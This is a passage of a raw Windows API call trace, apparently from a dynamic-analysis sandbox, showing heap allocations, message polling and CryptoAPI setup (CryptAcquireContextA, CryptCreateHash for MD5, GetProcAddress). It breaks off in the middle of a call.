[0240.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0240.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0240.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0240.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0240.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0240.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0240.454] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0240.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0240.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0240.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0240.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0240.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0240.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0240.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0240.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0240.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0240.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0240.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0240.455] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.456] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.456] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0240.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0240.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0240.456] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0240.456] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0240.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0240.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0240.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0240.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0240.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f9b8 | out: hHeap=0x970000) returned 1 [0240.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0240.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0240.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0240.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0240.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0240.457] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0240.457] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0240.457] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.457] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0240.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0240.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0240.457] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0240.457] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0240.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0240.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0240.457] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.457] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.457] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.458] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.458] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0240.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0240.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0240.458] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.458] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.458] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.458] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.458] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.458] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.458] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0240.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0240.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0240.459] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0240.459] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0240.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043f0 | out: hHeap=0x970000) returned 1 [0240.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0240.459] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0240.459] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0240.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0240.459] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0240.459] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0240.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0240.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0240.459] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0240.459] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0240.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0240.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0240.459] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0240.459] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.460] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.460] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0240.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04118 | out: hHeap=0x970000) returned 1 [0240.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0240.460] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0240.460] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0240.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0240.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0240.460] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0240.460] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0240.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0240.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51598, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0240.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0240.461] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0240.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0240.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0240.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0240.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0240.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0240.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0240.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0240.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0240.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0240.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0240.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0240.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0240.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0240.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0240.461] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0240.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0240.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0240.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0240.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0240.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0240.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0240.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0240.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0240.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0240.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0240.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0240.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0240.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0240.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0240.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0240.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0240.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0240.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0240.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0240.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0240.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0240.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0240.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0240.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0240.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0240.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0240.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0240.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0240.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0240.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0240.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0240.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0240.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0240.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0240.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0240.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0240.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0240.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0240.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0240.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0240.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0240.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0240.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0240.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0240.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0240.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0240.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0240.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0240.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0240.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0240.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0240.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0240.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0240.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0240.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0240.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0240.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0240.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0240.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0240.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0240.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0240.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0240.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0240.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0240.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0240.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0240.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0240.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0240.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0240.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0240.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0240.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0240.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0240.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0240.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0240.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0240.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0240.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0240.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0240.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0240.465] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0240.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0240.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0240.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0240.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0240.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0240.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0240.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0240.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0240.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0240.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0240.465] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0240.466] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0240.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0240.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0240.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0240.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0240.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0240.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0240.466] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0240.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0240.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0240.466] RtlAllocateHeap (HeapHandle=0x970000, 